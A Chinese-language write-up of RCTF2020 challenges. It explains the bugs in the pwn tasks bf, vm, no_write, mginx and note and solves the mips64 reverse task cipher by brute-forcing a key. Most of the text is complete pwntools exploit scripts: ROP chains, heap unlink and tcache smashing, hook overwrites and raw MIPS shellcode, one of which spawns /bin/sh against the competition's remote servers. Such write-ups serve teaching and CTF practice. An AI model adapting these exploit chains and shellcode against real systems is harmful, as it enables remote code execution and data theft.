RCTF2020部分题解

RCTF2020 一部分pwn(bf,mginx,vm,no_write,note)和re-cipher题解

bf

c++写的一个brain fuck的解释器，程序用到的结构体：

struct brain_fck{
	char data[0x400];	// data
	string code;	// brain fuck code
};

程序的漏洞在'>'操作的一个off_by_one：

判断条件是v21 > &v25而不是 >=，正好可以读取或者修改brain_fck.code的低字节

而brain_fck.code是个string类，string类的大致结构(当然我省略了大部分内容)为：

class string{
    char* ptr;
    size_t len;
    char buf[0x10];
}

当string的长度小于16的时候是把字符串放在buf里的，即ptr指向的是自己的buf，超出16个字节的时候就会进行malloc了。

再回头看漏洞，我们可以修改brain_fck.code的低字节，也就是意味着我们能修改code的ptr，在修改了ptr之后，我们就可以向ptr所指的内存写入数据或者读取数据，但是由于我们只能写一个字节，所以范围被限定在了[ptr&0,(ptr&0)+0xff]的范围内，不过这已经足够了。

因为一开始code是在栈上的，所以我们只要保证输入的brain fuck代码长度不超过16就能让ptr指向栈内存而不会被分配到堆上，在利用每次执行完代码的输出来泄露libc和栈地址，最后修改返回地址进行rop

为了确保exp的成功率，我们可以先泄露出brain_fck.code的低字节，在进行后续的攻击，最后返回的时候要修补一下brain_fck.code，不然析构函数可能会报错

exp：

from pwn import *
import sys

context.arch = 'amd64'

def write_low_bit(low_bit,offset):
	p.recvuntil("enter your code:\n")
	p.sendline(",[>,]>,")
	p.recvuntil("running....\n")
	p.send("B"*0x3ff+'\x00')
	p.send(chr(low_bit+offset))
	p.recvuntil("your code: ")
	p.recvuntil("continue?\n")
	p.send('y')
	p.recvuntil("enter your code:\n")
	p.sendline("\x00"*0xf)
	p.recvuntil("continue?\n")
	p.send('y')

def main(host,port=6002):
	global p
	if host:
		p = remote(host,port)
	else:
		p = process("./bf")
		
		# gdb.attach(p)
	# leak low_bit
	p.recvuntil("enter your code:\n")
	p.sendline(",[.>,]>.")
	p.send("B"*0x3ff+'\x00')
	p.recvuntil("running....\n")
	p.recvuntil("B"*0x3ff)
	low_bit = ord(p.recv(1))
	info(hex(low_bit))
	if low_bit + 0x70 >= 0x100:	# :(
		sys.exit(0)
	# debug(0x000000000001C47)
	p.recvuntil("continue?\n")
	p.send('y')
	
	
	# leak stack
	p.recvuntil("enter your code:\n")
	p.sendline(",[>,]>,")
	p.recvuntil("running....\n")
	p.send("B"*0x3ff+'\x00')
	p.send(chr(low_bit+0x20))
	p.recvuntil("your code: ")
	stack = u64(p.recvuntil("\n",drop=True).ljust(8,"\x00")) - 0xd8
	info("stack : " + hex(stack))
	p.recvuntil("continue?\n")
	p.send('y')
	# leak libc
	
	p.recvuntil("enter your code:\n")
	p.sendline(",[>,]>,")
	p.recvuntil("running....\n")
	p.send("B"*0x3ff+'\x00')
	p.send(chr(low_bit+0x38))
	p.recvuntil("your code: ")
	libc.address = u64(p.recvuntil("\n",drop=True).ljust(8,"\x00")) - 0x21b97
	info("libc : " + hex(libc.address))
	p.recvuntil("continue?\n")
	p.send('y')
	
	# do rop
	
	# 0x00000000000a17e0: pop rdi; ret;
	# 0x00000000001306d9: pop rdx; pop rsi; ret;
	p_rdi = 0x00000000000a17e0 + libc.address
	p_rdx_rsi = 0x00000000001306d9 + libc.address
	ret = 0x00000000000d3d8a + libc.address
	p_rax = 0x00000000000439c8 + libc.address
	syscall_ret = 0x00000000000d2975 + libc.address
	
	rop_chain = [
		0,0,p_rdi,0,p_rdx_rsi,0x100,stack,libc.symbols["read"]
	]
	
	rop_chain_len = len(rop_chain)
	
	for i in range(rop_chain_len-1,0,-1):
		write_low_bit(low_bit,0x57-8*(rop_chain_len-1-i))
		p.recvuntil("enter your code:\n")
		p.sendline('\x00'+p64(rop_chain[i-1])+p64(rop_chain[i])[:6])
		p.recvuntil("continue?\n")
		p.send('y')
	
	write_low_bit(low_bit,0)
	
	p.recvuntil("enter your code:\n")
	p.sendline('')
	p.recvuntil("continue?\n")
	p.send('n')
	
	
	payload = "/flag".ljust(0x30,'\x00')
	payload += flat([
		p_rax,2,p_rdi,stack,p_rdx_rsi,0,0,syscall_ret,
		p_rdi,3,p_rdx_rsi,0x80,stack+0x200,p_rax,0,syscall_ret,
		p_rax,1,p_rdi,1,syscall_ret
	])
	
	p.send(payload.ljust(0x100,'\x00'))
	
	
	p.interactive()
	
if __name__ == "__main__":
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	# elf = ELF("./bf",checksec=False)
	main(args['REMOTE'])

vm

这题没啥新的东西，程序唯一的输出点就是父进程会输出子进程的退出码，所以我们可以先读取flag，在用exit来一位一位的泄露出flag。

vm的结构体：

typedef struct{
    uint64_t r0;
    uint64_t r1;
    uint64_t r2;
    uint64_t r3;
    uint64_t r4;
    uint64_t r5;
    uint64_t r6;
    uint64_t r7;
    uint64_t* rsp;
    uint64_t* rbp;
    uint8_t* pc;
    uint32_t stack_size;
    uint32_t stack_cap;
}vm;

vm支持的操作

enum{
    OP_ADD = 0,	//add
    OP_SUB,     //sub
    OP_MUL,     //mul
    OP_DIV,     //div
    OP_MOV,     //mov
    OP_JSR,     //jump register
    OP_AND,     //bitwise and
    OP_XOR,     //bitwise xor
    OP_OR,      //bitwise or
    OP_NOT,     //bitwise not
    OP_PUSH,    //push
    OP_POP,     //pop
    OP_JMP,     //jump
    OP_ALLOC,   //alloc new stack
    OP_NOP,     //nop
};

程序先读取0x1000长度的指令，接着check指令是否合法，并把指令的数量一起传入到run函数，run函数在开始执行

程序的check函数中，并没有对jmp类指令进行check，这就是漏洞所在，在看程序一开始对vm的初始化：

stack在pc之后分配，意味着stack在高地址，所以我们可以先把指令压到栈中，在利用jmp指令，跳到栈中执行我们的指令，这里的指令就没有进行check了，我们可以越界读写

利用步骤大致为：

• 先把我们要执行的指令都压入vm的栈中，然后跳到栈中来执行
• 把vm的栈的所在堆的大小改小，使得free之后不会和top_chunk进行合并，这样我们就可以利用堆上残留的libc地址
• 利用堆上残留的libc地址，在配合add,sub，mov指令来进行任意地址写，修改__free_hook为setcontext+53
• 最后触发free来劫持程序，利用ROP进行orw读取flag，并把flag每一位当成状态码调用exit函数

exp：

from pwn import *

context.arch="amd64"

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))

def push_code(code):
	padding = 0 if (len(code)%8 == 0) else 8 - (len(code)%8)
	c = code+p8(instr["nop"])*padding	# align 8
	push_count = len(c)/8
	sc = (p8(instr["push"])+p8(1)+p64(0x21))*(0xf6-push_count)
	for i in range(push_count-1,-1,-1):
		sc += p8(instr["push"])+p8(1)+p64(u64(c[i*8:i*8+8]))
	return sc
	

def main(host,port=6001):
	global p
	if host:
		pass
	else:
		pass
		# debug(0x000000000000F66)
	flag = ''
	for i in range(0x40):
		p = remote(host,port)
		code = p8(instr["mov"])+p8(8)+p8(0)+p8(9)			# mov r0,rbp
		code += p8(instr["add"])+p8(1)+p8(1)+p64(0x701)		# add r1,0x701
		code += p8(instr["sub"])+p8(1)+p8(0)+p64(0x808)		# sub r0,0x800
		code += p8(instr["mov"])+p8(32)+p8(0)+p8(1)			# mov [r0],r1 ; overwrite chunk size
		code += p8(instr["alloc"])+p32(0x400)				# alloc(0x400) ; free chunk
		code += p8(instr["add"])+p8(1)+p8(0)+p64(8)			# add r0,0x8
		code += p8(instr["mov"])+p8(16)+p8(2)+p8(0)			# mov r2,[r0]
		code += p8(instr["sub"])+p8(1)+p8(2)+p64(0x3ec140)	# sub r2,0x3ec140 ; r2 --> libc_base
		code += p8(instr["mov"])+p8(8)+p8(3)+p8(2)			# mov r3,r2
		code += p8(instr["add"])+p8(1)+p8(3)+p64(libc.symbols["__free_hook"])		
															# add r3,libc.symbols["__free_hook"]
		code += p8(instr["mov"])+p8(8)+p8(4)+p8(2)			# mov r4,r2
		code += p8(instr["add"])+p8(1)+p8(4)+p64(libc.symbols["setcontext"]+0x35)
															# add r4,libc.symbols["setcontext"]+0x35
		code += p8(instr["mov"])+p8(32)+p8(3)+p8(4)			# mov [r3],r4 ; overwrite chunk size
		
		
		code += p8(instr["mov"])+p8(1)+p8(1)+p64(u64("/flag".ljust(8,"\x00")))
															# mov r1,'/flag'
		code += p8(instr["mov"])+p8(32)+p8(0)+p8(1)			# mov [r0],r1 
		
		code += p8(instr["mov"])+p8(8)+p8(1)+p8(0)			# mov r1,r0
		code += p8(instr["add"])+p8(1)+p8(0)+p64(0x68)		# add r0,0x68
		code += p8(instr["mov"])+p8(32)+p8(0)+p8(1)			# mov [r0],r1	# rdi
		
		code += p8(instr["add"])+p8(1)+p8(0)+p64(0x10)		# add r0,0x10
		code += p8(instr["add"])+p8(1)+p8(1)+p64(0x300)		# add r1,0x300
		code += p8(instr["mov"])+p8(32)+p8(0)+p8(1)			# mov [r0],r1	# rbp
		
		
		code += p8(instr["add"])+p8(1)+p8(0)+p64(0x28)		# add r0,0x28
		code += p8(instr["add"])+p8(1)+p8(1)+p64(0xa8)		# add r1,0x200
		code += p8(instr["mov"])+p8(32)+p8(0)+p8(1)			# mov [r0],r1	# rsp
		
		code += p8(instr["add"])+p8(1)+p8(0)+p64(0x8)		# add r0,0x8
		code += p8(instr["mov"])+p8(8)+p8(3)+p8(2)			# mov r3,r2
		code += p8(instr["add"])+p8(1)+p8(3)+p64(0x439c8)	# add r3,offset
		code += p8(instr["mov"])+p8(32)+p8(0)+p8(3)			# mov [r0],r3	# rcx
		# 0x00000000000d3d8a: ret;
		# 0x00000000000a17e0: pop rdi; ret; 
		# 0x00000000001306d9: pop rdx; pop rsi; ret;
		# 0x00000000000439c8: pop rax; ret;
		# 0x00000000000d2975: syscall; ret;
		# 0x000000000002f128: mov rax, qword ptr [rsi + rax*8 + 0x80]; ret;
		# 0x000000000012188f: mov rdi, rax; mov eax, 0x3c; syscall;
		ret = 0x00000000000d3d8a
		p_rdi = 0x00000000000a17e0
		p_rdx_rsi = 0x00000000001306d9
		p_rax = 0x00000000000439c8
		syscall_ret = 0x00000000000d2975
		
		buf = 0x3ec000
		payload = [
			ret,p_rax,2,p_rdx_rsi,0,0,syscall_ret,
			p_rdi,0,p_rdx_rsi,0x80,buf,p_rax,0,syscall_ret,
			p_rax,0,p_rdx_rsi,0,buf-0x80+i,0x2f128,0x12188f
		]
		
		code += p8(instr["mov"])+p8(8)+p8(0)+p8(1)			# mov r0,r1 
		
		for value in payload:
			if value < 0x100:
				code += p8(instr["mov"])+p8(1)+p8(1)+p64(value)		# mov r1,value
				code += p8(instr["mov"])+p8(32)+p8(0)+p8(1)			# mov [r0],r1
			else:			
				code += p8(instr["mov"])+p8(8)+p8(3)+p8(2)			# mov r3,r2
				code += p8(instr["add"])+p8(1)+p8(3)+p64(value)		# add r3,offset
				code += p8(instr["mov"])+p8(32)+p8(0)+p8(3)			# mov [r0],r3
			code += p8(instr["add"])+p8(1)+p8(0)+p64(0x8)			# add r0,0x8
		
		
		code += p8(instr["alloc"])+p32(0x200)				# alloc(0x200) ; trigger free
		code = push_code(code)
				
		p.recvuntil("code: ")
		p.send(code.ljust(0xf6d,p8(instr["nop"]))+p8(instr["jmp"])+p8(0xf1)+p8(instr["nop"])*0x90+'\xff')
		
		p.recvuntil("code: ")
		
		flag += chr(int(p.recv(),16))
		info(flag)
		
		p.close()
		
		# pause()
		
		if flag[-1] == '}':
			break;
	
if __name__ == "__main__":
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	# elf = ELF("./easy_printf",checksec=False)
	instr = {"add":0,"sub":1,"mul":2,"div":3,"mov":4,"jsr":5,"and":6,"xor":7,"or":8,"not":9,"push":10,"pop":11,"jmp":12,"alloc":13,"nop":14}
	main(args['REMOTE'])

no_write

程序只允许我们使用open，read，exit和exit_group系统调用，没有write，所以我们得找到一种方法来泄露flag

首先是没有了write系统调用，我们不能进行泄露，但是我们可以用这个gadget来获得我们想要的libc地址：

.text:00000000004005E8                 add     [rbp-3Dh], ebx
.text:00000000004005EB                 nop     dword ptr [rax+rax+00h]

rbp和ebx都是我们可控的

我们可以用栈迁移的方法把栈迁移到bss段上，接着调用__libc_start_main使得bss段上残留下libc的地址，再利用上述的gadget，我们就可以达到任意call的目的

现在的问题就是怎么泄露flag了，这里我给出的一种方法是利用strncmp函数来一个个的比较flag

具体思路如下：

• 先open和read，把flag读取到bss段上
• 再把我们要爆破的一个字符输入到bss段的末尾（0x601FFFF）
• 接着调用strncmp(flag,0x601FFFF,2)，如果我们上一步输入的字符和flag开头一样的话，程序就会segment fault，打远程的时候就表现为收到了EOF，因为strncmp正尝试读取0x602000处的内容
• 如果比较不正确，程序可以继续运行下去，我们可以在使程序多调用几次read来读取我们的输入，以此来和比较正确的情况进行区分

exp：

from pwn import *
import string
context.arch='amd64'

def ret_csu(func,arg1=0,arg2=0,arg3=0):
	payload = ''
	payload += p64(0)+p64(1)+p64(func)
	payload += p64(arg1)+p64(arg2)+p64(arg3)+p64(0x000000000400750)+p64(0)
	return payload
def main(host,port=2333):
	# global p
	# if host:
		# p = remote(host,port)
	# else:
		# p = process("./no_write")
		# gdb.attach(p,"b* 0x0000000004006E6")
	# 0x0000000000400773 : pop rdi ; ret
	# 0x0000000000400771 : pop rsi ; pop r15 ; ret
	# .text:0000000000400544                 call    cs:__libc_start_main_ptr
	
	# .text:00000000004005E8                 add     [rbp-3Dh], ebx
	# .text:00000000004005EB                 nop     dword ptr [rax+rax+00h]
	# .text:00000000004005F0                 rep retn
	charset = '}{_'+string.digits+string.letters
	flag = ''
	for i in range(0x30):
		for j in charset:
			try:
				p = remote(host,6000)
				pppppp_ret = 0x00000000040076A
				read_got = 0x000000000600FD8
				call_libc_start_main = 0x000000000400544
				p_rdi = 0x0000000000400773
				p_rsi_r15 = 0x0000000000400771
				# 03:0018|	0x601318 -> 0x7f6352629d80 (initial) <-0x0
				offset = 0x267870 #initial - __strncmp_sse42
				readn = 0x0000000004006BF
				leave_tet = 0x00000000040070B
				payload = "A"*0x18+p64(pppppp_ret)+ret_csu(read_got,0,0x601350,0x400)
				payload += p64(0)+p64(0x6013f8)+p64(0)*4+p64(leave_tet)
				payload = payload.ljust(0x100,'\x00')
				p.send(payload)
				sleep(0.3)
				payload = "\x00"*(0x100-0x50)
				payload += p64(p_rdi)+p64(readn)+p64(call_libc_start_main)
				payload = payload.ljust(0x400,'\x00')
				p.send(payload)
				sleep(0.3)
				# 0x601318
				payload = p64(pppppp_ret)+p64((0x100000000-offset)&0xffffffff)
				payload += p64(0x601318+0x3D)+p64(0)*4+p64(0x4005E8)
				# 0x00000000000d2975: syscall; ret;
				# 02:0010|            0x601310 -> 0x7f61d00d8628 (__exit_funcs_lock) <- 0x0
				offset = 0x31dcb3 # __exit_funcs_lock - syscall
				payload += p64(pppppp_ret)+p64((0x100000000-offset)&0xffffffff)
				payload += p64(0x601310+0x3D)+p64(0)*4+p64(0x4005E8)
				payload += p64(pppppp_ret)+ret_csu(read_got,0,0x601800,2)
				payload += p64(0)*6
				payload += p64(pppppp_ret)+ret_csu(0x601310,0x601350+0x3f8,0,0)	#open flag
				payload += p64(0)*6
				payload += p64(pppppp_ret)+ret_csu(read_got,3,0x601800,0x100)	#read flag
				payload += p64(0)*6
				payload += p64(pppppp_ret)+ret_csu(read_got,0,0x601ff8,8)
				# now we can cmp the flag one_by_one
				payload += p64(0)*6	
				payload += p64(pppppp_ret)+ret_csu(0x601318,0x601800+i,0x601fff,2)
				payload += p64(0)*6
				for _ in range(4):
					payload += p64(p_rdi)+p64(0x601700)+p64(p_rsi_r15)+p64(0x100)+p64(0)+p64(readn)
					
				payload = payload.ljust(0x3f8,'\x00')
				payload += "flag\x00\x00\x00\x00"
				p.send(payload)
				sleep(0.3)
				p.send("dd"+"d"*7+j)
				sleep(0.5)
				p.recv(timeout=0.5)
				p.send("A"*0x100)
				# info(j)
				p.close()
				# p.interactive()
			except EOFError:
				flag += j
				info(flag)
				if(j == '}'):
					exit()
				p.close()
				# pause()
				break
if __name__ == "__main__":
	# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
	main(args["REMOTE"])

mginx

这题得给各位师傅道个歉，赛后我发现是可以getshell的，设置下execve的argv参数即可，比赛的时候说不能getshell导致做这题的师傅体验极其不好，实在是对不起各位师傅

mips64 大端序，没有去除符号表，打开Ghidra进行反编译，Ghidra反编译的结果还是相当可以的

程序逻辑也不是很复杂，就是一个超级简陋的http server，多调试调试就会发现下面代码里有一处栈溢出：

这个sStack4280就是我们的Content-Length在加上body的长度，如果我们设置Content-Length为4095，body里在填入多个字节，那sStack4280就会超过0x1000，直接导致了栈溢出，以下是一个poc：

req = """GET /index \r
Connection: no\r
Content-Length: 4095
\r\n\r
"""
	req = req.ljust(0xf0,"A")
	# pause()
	p.send(req)

有了这个栈溢出，我们就可以劫持main函数的返回地址，程序没有开启PIE，而且数据段是可以执行的，但是远程的环境是开启了ASLR，所以我们得先绕过下ASLR

既然栈溢出了，首先想到的是ROP，但是这个程序没有多少可以用的gadget，所以ROP几乎不太行，可以考虑下栈迁移，我们先看下main函数返回时的几条指令：

我们可以控制ra,s8和gp，但是要跳到哪里呢，这时候没啥好办法了，只能都试试，我选择跳到了：

即开头处的那个read，我们可以把s8覆盖为数据段的地址，这样我们就可以把shellcode读入到data段，在利用main函数中的栈溢出把返回地址覆盖为数据段上shellcode的地址，这样我们不需要泄露任何地址就可以执行shellcode了

orw的exp：

#python exp.py REMOTE=124.156.129.96 DEBUG
from pwn import *
import sys

context.update(arch='mips',bits=64,endian="big")

def main(host,port=8888):
	global p
	if host:
		p = remote(host,port)
	else:
		# p = process(["qemu-mips64","-g","1234","./mginx"])
		p = process(["qemu-mips64","./mginx"])
		# gdb.attach(p)
		#
	req = """GET /index \r
Connection: no\r
Content-Length: 4095
\r\n\r
"""
	req = req.ljust(0xf0,"A")
	# pause()
	p.send(req)
	# pause()
	# orw
	sc = "\x3c\x0d\x2f\x66\x35\xad\x6c\x61\xaf\xad\xff\xf8\x3c\x0d\x67\x00\xaf\xad\xff\xfc\x67\xa4\xff\xf8\x34\x05\xff\xff\x00\xa0\x28\x2a\x34\x02\x13\x8a\x01\x01\x01\x0c"
	sc += "\x00\x40\x20\x25\x24\x06\x01\x00\x67\xa5\xff\x00\x34\x02\x13\x88\x01\x01\x01\x0c"
	sc += "\x24\x04\x00\x01\x34\x02\x13\x89\x01\x01\x01\x0c"

	payload = "A"*0xf30
	payload += p64(0x000000012001a250)+p64(0x000000120012400)
	# remain 0x179 byte
	
	payload += p64(0x1200018c4)+"D"*(0x179-8)
	p.send(payload)
	p.recvuntil("404 Not Found :(",timeout=1)
	
	# pause()
	

	req = """GET /index \r
Connection: no\r
Content-Length: 4095
\r\n\r
"""
	req = req.ljust(0xf0,"\x00")
	p.send(req)
	# pause()
	payload = "\x00"*0xa88
	# fix the chunk
	payload += p64(0) + p64(21)
	payload += "\x00"*(0xf40-0xa98)
	# remain 0x179 byte
	
	payload += p64(0x00000001200134c0)
	payload += "\x00"*0x20+sc+"\x00"*(0x179-0x28-len(sc))
	
	p.send(payload)
	try:
		p.recvuntil("404 Not Found :(",timeout=1)
		flag = p.recvuntil("}",timeout=1)
		if flag != '' :
			info(flag)
			pause()
	except:
		p.close()
		return
	p.close()
	
if __name__ == "__main__":
	for i in range(200):
		try:
			main(args['REMOTE'])
		except:
			continue           

PS: 由于远程环境问题，得多跑几次脚本，不过几十次差不多了

结果：

getshell的exp:

from pwn import *
import sys

context.update(arch='mips',bits=64,endian="big")

def main(host,port=8888):
	global p
	if host:
		p = remote(host,port)
	else:
		# p = process(["qemu-mips64","-g","1234","./mginx"])
		p = process(["qemu-mips64","./mginx"])
		# gdb.attach(p)
		#
	
	req = """GET /index \r
Connection: no\r
Content-Length: 4095
\r\n\r
"""
	req = req.ljust(0xf0,"A")
	
	p.send(req)
	# pause()

	# getshell
	sc = "\x03\xa0\x28\x25\x64\xa5\xf3\x40"
	sc +=  "\x3c\x0c\x2f\x2f\x35\x8c\x62\x69\xaf\xac\xff\xf4\x3c\x0d\x6e\x2f\x35\xad\x73\x68\xaf\xad\xff\xf8\xaf\xa0\xff\xfc\x67\xa4\xff\xf4\x28\x06\xff\xff\x24\x02\x13\xc1\x01\x01\x01\x0c"


	payload = "A"*0xf30
	payload += p64(0x000000012001a250)+p64(0x000000120012400)
	# remain 0x179 byte
	
	payload += p64(0x1200018c4)+"D"*(0x179-8)
	p.send(payload)
	p.recvuntil("404 Not Found :(",timeout=1)
	
	
	

	req = """GET /index \r
Connection: no\r
Content-Length: 4095
\r\n\r
"""
	req = req.ljust(0xf0,"\x00")
	p.send(req)
	
	payload = "\x00"*0x288
	# argv_ 0x0000000120012800
	argv_ = p64(0x120012820)+p64(0x120012828)+p64(0x120012830)+p64(0)
	argv_ += "sh".ljust(8,'\x00')
	argv_ += "-c".ljust(8,'\x00')
	argv_ += "/bin/sh".ljust(8,'\x00')
	payload += argv_
	payload += "\x00"*(0x800 - len(argv_))
	# fix the chunk
	payload += p64(0) + p64(21)
	payload += "\x00"*(0xf40-0xa98)
	# remain 0x179 byte
	
	payload += p64(0x00000001200134c0)

	payload += "\x00"*0x20+sc+"\x00"*(0x179-0x28-len(sc))
	
	p.send(payload)
	try:
		p.recvuntil("404 Not Found :(",timeout=1)
		p.sendline("echo dididididi")
		_ = p.recvuntil("didid",timeout=1)
		if _ != '':
			p.interactive()
	except:
		p.close()
		return
	p.close()
	
	
if __name__ == "__main__":
	for i in range(200):
		try:
			main(args['REMOTE'])
		except:
			continue
	# main(args['REMOTE'])

note

Step 1:get enough money

money初始值为0x996，size * 857 > money则⽆法申请，delete函数中有money += size的操作，所以

⾸先需要通过乘法溢出修改money的值为后续操作准备

Step 2:leak libc and heap

calloc函数申请 的是⼀个MMAP的chunk是不会执⾏memset清空操作的，⽽super_edit(choice 7)中是

存在堆溢出的，通过堆溢出修改mmap标志位为1 ，从⽽泄漏libc 和 heap

Step 3: tcache smashing unlink

通过edit函数中存在的off by null 实现unlink，进⽽tcache smashing unlink到malloc_hook上⽅，

super_buy(choice 6)会调⽤malloc，从⽽覆盖malloc_hook为onegadget

exp：

#coding:utf-8
from pwn import *
import hashlib
import sys,string

local = 1

# if len(sys.argv) == 2 and (sys.argv[1] == 'DEBUG' or sys.argv[1] == 'debug'):
    # context.log_level = 'debug'

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# libc = ELF('./libc_debug.so',checksec=False)
one = [0xe237f,0xe2383,0xe2386,0x106ef8]

if local:
    p = process('./note_')
    
else:
	p = remote("124.156.135.103",6004)
	
def debug(addr=0,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        #print "breakpoint_addr --> " + hex(text_base + 0x202040)
        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(p,"b *{}".format(hex(addr))) 

sd = lambda s:p.send(s)
rc = lambda s:p.recv(s)
sl = lambda s:p.sendline(s)
ru = lambda s:p.recvuntil(s)
sda = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)


def info(name,addr):
	log.info(name + " --> %s",hex(addr))

def add(idx,size):
    sla("Choice: ",'1')
    sla("Index: ",str(idx))
    sla("Size: ",str(size))
    

def delete(idx):
    sla("Choice: ",'2')
    sla("Index: ",str(idx))

def show(idx):
    sla("Choice: ",'3')
    sla("Index: ",str(idx))

def edit(idx,data):
    sla("Choice: ",'4')
    sla("Index: ",str(idx))
    sla("Message: \n",data)

def super_edit(idx,data):
    sla("Choice: ",'7')
    sla("Index: ",str(idx))
    sda("Message: \n",data)

def get_money():
    sla("Choice: ",'1')
    sla("Index: ",str(0))
    sla("Size: ",'21524788884141834')
    delete(0)

def super_buy(data):
    sla("Choice: ",'6')
    sla("name: \n",data)


# get enough money
get_money()

# leak heap and libc address
add(0,0x80)
add(1,0x500)
add(2,0x80)
delete(1)

add(1,0x600) #now 0x510 in largebin

pay = 0x88*b'\x00' + p64(0x510+1+2)
super_edit(0,pay) # overwrite is_mmap flag 

add(3,0x500)

show(3)
rc(8)
# libc_base = u64(rc(8)) - 0x1eb010
libc_base = u64(rc(8)) - 0x1e50d0
heap_base = u64(rc(8)) - 0x320 



malloc_hook = libc_base + libc.symbols['__malloc_hook']
free_hook = libc_base + libc.symbols['__free_hook']
realloc = libc_base + libc.symbols['realloc']
onegadget = libc_base + one[3]

# fill tcache 0x90
delete(0)
delete(1)
delete(2)
for i in range(5):
    add(0,0x80)
    delete(0)
# fill tcache 0x60
for i in range(5):
    add(0,0x50)
    delete(0)

# fill tcache 0x230
for i in range(7):
    add(0,0x220)
    delete(0)
# set a 0x60 to smallbin 
add(0,0x420)
add(1,0x10)
delete(0)
add(0,0x3c0)
add(2,0x60)

# null off by one to unlink
target = heap_base + 0x2220 #unlink target
pay = b''
pay += p64(0)
pay += p64(0x231)
pay += p64(target - 0x18)
pay += p64(target - 0x10)
pay += p64(target) #ptr
add(4,0x80)
edit(4,pay)

add(5,0x80)
edit(5,p64(heap_base+0x2190))

add(6,0x80)
add(7,0x80)

add(8,0x5f0) # will be freed and consolidate with topchunk
delete(7)
pay = 0x80*b'\x00' + p64(0x230)
add(7,0x88)
edit(7,pay)

delete(8) #unlink
add(8,0x220)
add(9,0x90)
delete(8)
add(8,0x1c0)
add(10,0x60)

pay = b'a'*0x20 + p64(0) + p64(0x61)
pay += p64(heap_base + 0x2090)
pay += p64(malloc_hook - 0x38)
edit(7,pay)
info("libc_base",libc_base)
info("heap_base",heap_base)

add(11,0x50)
pay = b'\x00'*0x20 + p64(onegadget) + p64(realloc+9)
super_buy(pay)

add(12,0x70)

p.interactive()

cipher

mips64 大端序，理清程序逻辑，写出对应的解密函数即可，但是由于key的初始值是由rand()函数来的，所以需要爆破下key

exp：

from struct import pack, unpack

def ROR(x,r):
    return (x>>r)|((x<<(64-r))&0xffffffffffffffff)
def ROL(x,r):
    return (x>>(64-r))|((x<<r)&0xffffffffffffffff)
def R(x,y,k):
    x = ROR(x,8)
    x = (x+y)&0xffffffffffffffff
    x^=k
    y = ROL(y,3)
    y^=x
    return x,y
def RI(x,y,k):
    y^=x
    y = ROR(y,3)
    x^=k
    x = (x-y)&0xffffffffffffffff
    x = ROL(x,8)
    return x,y


def encrypt(t,k):
    y=t[0]
    x=t[1]
    b=k[0]
    a=k[1]
    x,y = R(x,y,b)
    for i in range(31):
        a,b = R(a,b,i)
        x,y = R(x,y,b)
    return y,x

def decrypt(t,k):
    y=t[0]
    x=t[1]
    b=k[0]
    a=k[1]
    keys = []
    for i in range(32):
        keys.append(b)
        a,b = R(a,b,i)
    for i in range(32):
        x,y = RI(x,y,keys[31-i])
    return y,x

def solve():
    with open('ciphertext', 'rb') as f:
        ct = f.read().strip()
    print ct.encode('hex')
    key = -1
    for i in range(65536):
        t0 = unpack('>Q',ct[:8])[0]
        t1 = unpack('>Q',ct[8:16])[0]
        x,y = decrypt([t0,t1],[i<<48,0])
        ans = pack('>Q',x)+pack('>Q',y)
        if ans.startswith('RCTF'):
            key = i
            break

    assert key!=-1
    print key
    ans = ''
    for i in range(len(ct)/16):
        t0 = unpack('>Q',ct[i*16:i*16+8])[0]
        t1 = unpack('>Q',ct[i*16+8:i*16+16])[0]
        print hex(t0), hex(t1)
        x,y = decrypt([t0,t1],[key<<48,0])
        ans += pack('>Q',x)+pack('>Q',y)
    print ans
        
solve()